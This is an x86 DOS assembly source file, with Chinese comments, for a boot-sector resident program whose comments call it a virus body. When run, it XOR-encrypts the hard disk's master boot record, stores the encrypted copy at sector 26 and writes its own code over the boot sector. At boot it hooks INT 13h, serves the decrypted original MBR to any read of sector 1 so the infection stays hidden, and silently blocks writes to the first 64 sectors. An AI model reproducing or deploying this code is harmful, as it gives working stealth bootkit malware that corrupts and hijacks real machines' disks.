tsr.asm

驻留程序TSR

 code segment
     assume cs:code,ds:code,es:code
     org 100h

Main PROC FAR
    start:
     jmp BeginWrite
  begin:
;    push es
;    push ds
    mov cx,0100h 
    mov di,0600h	
    mov ax,0000h	
    mov ds,ax
    mov es,ax
    mov si,7c00h
	cld
    REP MOVSW
    mov bx,offset rrr444rr - offset begin + 0600h
    jmp bx  
  rrr444rr:
    xor ax,ax 
    mov ds,ax 
    push ds
   ;;;;;;;;;;;;;
    mov ax,word ptr ds:[413h] ; here store largest mem 0000:0413 
    dec ax
    dec ax   ; 减去2K
    mov ds:[413h],ax 
    MOV CL,06h ; 
    SHL AX,CL ;ax=9f80h
    MOV ES,AX ;算出减2K后病毒本体的位址,计算高端段址(为设置新的INT 13H准备)
    ;;;;;;;;;;;;;;;
    MOV AX,ds:[004Ch] ;取中断向量表中,INT 13H的偏移位置 
    mov di,0000h
    mov word ptr es:[di],ax
    MOV AX,ds:[004Eh] ;取INT 13H的段地址
    add di,02h
    mov word ptr es:[di],ax
    ;;;;;;;;;;;;;
    cli
    MOV AX,010h ;将新的INT 13H位置写入中断向量表
    MOV word ptr ds:[004Ch],ax
    MOV AX,ES 
    MOV word ptr ds:[004Eh],ax
    sti
    ;;;;;;;;;;;;;;
    mov cx,offset NewInt13hCodeEnd - offset NewInt13hCodeBegin
    pop ds
    mov si,offset NewInt13hCodeBegin - offset begin + 0600h   ;
    mov di,0010h
    rep movsb  ;将这段程序搬到高端
    mov bx,offset NewInt13hCodeEnd - offset begin + 0600h
    jmp bx
  NewInt13hCodeBegin:
	sti

    push ds
    push si
    push di
;    push ax
    push cx
    push dx
    cmp ah,03h
    jne NotWriteHarddsik
    cmp dx,080h
    jne NotWriteHarddsik
    cmp cx,40h
    jbe NewInt13Exit ;如果是写前64个扇区则退出中断
  NotWriteHarddsik:
    cmp ah,02h
    jne ReadHarddiskNatural   
    cmp dx,080h
    jne ReadHarddiskNatural    
    cmp cx,001h               ;是否是想读原MBR
    jne ReadHarddiskNatural 
    pushf      
    call dword ptr cs:[0000h]
	push ax
	mov ax,0201h       
    ;;;;;;;;;;;;;;;
	;读原引导记录
    mov cx,01ah         ;将加了密的MBR读出来

    pushf      
    call dword ptr cs:[0000h]
    ;;;;;;;;;;;;;       ;将加了密的MBR读出来解密
        push di
        push cx
        push ax
        mov di,bx
        mov cx,200h
;        cld
    GetRightMBRInfo:
        mov al,es:[di]
        xor al,2eh
        mov byte ptr es:[di],al
        inc di
        loop GetRightMBRInfo
        pop ax
        pop cx
        pop di
	pop ax
;;;;;;;;;;;;;;;;;;;
    pop dx 
    pop cx 
 ;   pop ax 
    pop di 
    pop si 
    pop ds 
    retf 0002 
  ReadHarddiskNatural:
    pushf
    call dword ptr cs:[0000h]
NewInt13Exit:
    pop dx 
    pop cx 
;    pop ax 
    pop di 
    pop si 
    pop ds
    retf 0002

  NewInt13hCodeEnd: 	     
	push ds
    pop es
    mov ax,201h 
    mov bx,7c00h
    mov cx,001h 
    mov dx,080h
    int 13h
    jmp bx

BeginWrite:
    ;;;;;;;;;;;;;;;;;;;;;;;;;;;
	;加密正确的MBR于1ah处
    mov ax,201h
    mov bx,2000h
    mov cx,001h
    mov dx,080h
    int 13h

	mov di,bx
	mov cx,200h
	cld
 EncryptMBR:
	mov al,[di]
	xor al,2eh
	mov byte ptr [di],al
	inc di
	loop EncryptMBR

    mov ax,301h
    mov bx,2000h
    mov cx,01ah
    mov dx,080h
    int 13h
   ;;;;;;;;;;;;;;;;;;;;;;;;

    mov cx,offset BeginWrite - offset begin 
    mov di,offset buf	
    mov si,offset begin
    rep movsb 

    mov ax,301h
    mov bx,offset buf
    mov cx,001h
    mov dx,080h
    int 13h

Main ENDP    

show11 proc near
  mov ax,cs
  mov ds,ax
  mov ah,09h
  mov dx,offset showchar
  int 21h

  int 20h ;ret
show11 endp
  showchar db 'success!','$'
  buf db 510 dup(0)
      db 55h,0aah
code ends
     end Main